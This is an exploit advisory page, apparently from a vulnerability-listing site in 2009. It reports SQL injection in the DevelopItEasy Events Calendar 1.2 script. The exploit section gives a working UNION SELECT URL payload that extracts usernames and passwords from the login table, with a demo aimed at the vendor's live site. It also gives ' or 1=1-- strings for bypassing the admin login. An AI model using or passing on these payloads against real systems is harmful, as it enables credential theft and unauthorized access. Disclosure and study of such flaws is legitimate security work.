DevelopItEasy Events Calendar 1.2 Multiple SQL Injection Vulnerabilities

2009.04.09
Credit: Cyb3r-1sT
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

| > Kings of injection | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| <<!>> Found by : Cyb3r-1sT <<!>> C0ntact : cyb3r-1st [at] hotmail.com <<!>> Groups : InjEctOr5 T3am <<!>> site : www.tryag.cc/cc ======================================================= +++++++++++++++++++ Script information+++++++++++++++++ ======================================================= <<->> script : Events Calendar v 1.2 <<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= <<->> D0rk : find it <<->> Exploit :>>> >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- <<->> Exploit <<->> bypass <<->> >>>> www.developiteasy.com/events_calendar/admin >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) ======================================================= ++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ ======================================================= <<->> All freinds and all muslims


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top